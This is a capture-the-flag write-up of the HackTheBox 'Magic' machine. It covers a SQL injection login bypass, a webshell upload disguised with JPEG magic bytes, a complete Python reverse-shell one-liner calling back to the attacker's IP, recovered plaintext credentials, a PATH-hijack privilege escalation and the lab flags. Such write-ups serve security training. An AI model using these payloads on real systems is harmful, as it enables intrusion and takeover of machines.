Setup
mkdir -p ~/ctf/HackTheBox/magic/scans; cd ~/ctf/HackTheBox/magic
IP Address: 10.10.10.185
echo "10.10.10.185 magic.htb" | sudo tee -a /etc/hosts
10.10.10.185 magic.htb
Enumeration
nmap -sC -sV -Pn -p- magic.htb -oN scans/nmap -vv
nmap -sC -sV -p- -T5 -vv --min-rate 2500 -oN scans/nmap_2 magic.htb
# nmap findings
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQClcZO7AyXva0myXqRYz5xgxJ8ljSW1c6xX0vzHxP/Qy024qtSuDeQIRZGYsIR+kyje39aNw6HHxdz50XSBSEcauPLDWbIYLUMM+a0smh7/pRjfA+vqHxEp7e5l9H7Nbb1dzQesANxa1glKsEmKi1N8Yg0QHX0/FciFt1rdES9Y4b3I3gse2mSAfdNWn4ApnGnpy1tUbanZYdRtpvufqPWjzxUkFEnFIPrslKZoiQ+MLnp77DXfIm3PGjdhui0PBlkebTGbgo4+U44fniEweNJSkiaZW/CuKte0j/buSlBlnagzDl0meeT8EpBOPjk+F0v6Yr7heTuAZn75pO3l5RHX
| 256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOVyH7ButfnaTRJb0CdXzeCYFPEmm6nkSUd4d52dW6XybW9XjBanHE/FM4kZ7bJKFEOaLzF1lDizNQgiffGWWLQ=
| 256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIE0dM4nfekm9dJWdTux9TqCyCGtW5rbmHfh/4v3NtTU1
80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Using ffuf & gobuster, we try to enumerate directories and subdomains but nothing of use can be seen.
Then i shift my focus to already given login page to check for SQLi and other web attacks.
Using the basic ‘'’ or ‘1’ = ‘1` test we get a access to the upload page:
If we try uploading a php file we get the error
lets try adding .jpg to the end, we still get the following error
Now we test a file with parameter webshell and insert jpeg magic bytes at the start of file and check if the file is being checked for magic bytes.
The payload photo was successfully uploaded lets test it for commands
The command execution is working successfully now :
Using https://www.revshells.com/ we get a bash command to get a reverse shell on our machine which we can then inject through browser
We are able to spawn a reverse shell using python installed on the server using the payload
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.14.36",9001));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("bash")'
in the home directory we find a Magic directory in which there is a db.php5 file containing Database credentials
theseus:iamkingtheseus
The above credentials dont work for ssh,
Using an already existing binary mysqldump on the box we provide the known username password and database name and get a password from login table
trying that to su with this password
theseus:Th3s3usW4sK1ng
now we got a shell as theseus and got the user flag
User Flag
Location: /home/theseus/user.txt | Flag: 12dc7fc9f7489a4f8c1a40f1a1aefa8e
Privilege Escalation
Using the find / -perm -u=s -type f 2>/dev/null
We get the following files, especially a binary file named sysinfo
when we run this it outputs system info like CPU, disk, memory ,etc. Using ltrace we see this program is using fdisk without proper path
I make a bash script with reverse shell and name the file as fdisk
then add the tmp folder to the start of PATH variable so that OS searches for fdisk in tmp folder first
when we run sysinfo we get a reverse shell as root and we can read the root flag
Root Flag
Location:/root/root.txt | Flag: a0e2edc812d8ab00826e45f64fa42977